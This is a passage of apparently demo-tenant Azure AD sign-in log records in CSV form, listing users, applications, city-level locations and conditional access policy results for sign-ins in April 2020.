+295,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:26.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2b19a788-00c7-43a5-9dcc-b0b8d5df5d21,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7688e8c0-f176-4f1e-95a2-c1ff34281500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,7688e8c0-f176-4f1e-95a2-c1ff34281500,SigninLogs,Sucess,33.7984581,-84.38828278
+296,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:53.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c0a397ce-0ebd-41f6-bdd6-fa62edea1e56,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",22fd8c7c-75eb-4549-80fa-1727f12f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-1727f12f1400,SigninLogs,Sucess,33.7984581,-84.38828278
+297,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:11.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4fe45728-a311-46a8-88e6-15da95570bfe,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f8c71dc9-cc0d-48fb-832c-2ed8fd001300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f8c71dc9-cc0d-48fb-832c-2ed8fd001300,SigninLogs,Sucess,41.90428925,-85.99833679
+298,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8c8b84e-05ac-4dd5-9cb9-887df2c3b9b5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcd861f1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,09a9b111-0bef-49d6-ac1b-dbcd861f1800,SigninLogs,Sucess,33.7984581,-84.38828278
+299,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:24.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7a0a3bcd-cad1-4442-984b-9e6d85522248,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",1dc1286f-da3f-4a48-9584-fc8fa90e1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1dc1286f-da3f-4a48-9584-fc8fa90e1700,SigninLogs,Sucess,35.01296997,-80.93171692
+300,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:22.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e09d517-1c9d-4d8c-b42e-2b4d00ffc1a4,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",69bf3c7f-96b8-4aae-959c-a7bb5f481300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,69bf3c7f-96b8-4aae-959c-a7bb5f481300,SigninLogs,Sucess,41.90428925,-85.99833679
+301,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:26.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f7ba3cc7-11fe-4554-9ac4-efced7ef1300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f7ba3cc7-11fe-4554-9ac4-efced7ef1300,SigninLogs,Sucess,50.6406517,5.572050095
+302,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:14.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,650052,None,Other,0,1523c6b1-460e-4bf0-b7cd-bf0f3b2fa1f8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Modern Workplace Tools,fe6aa35b-7da8-44fd-a44e-e2d4bafbdab5,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",23877b62-2023-4ce4-9fb4-bf65e3b51300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 650052, 'failureReason': 'Other'}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active 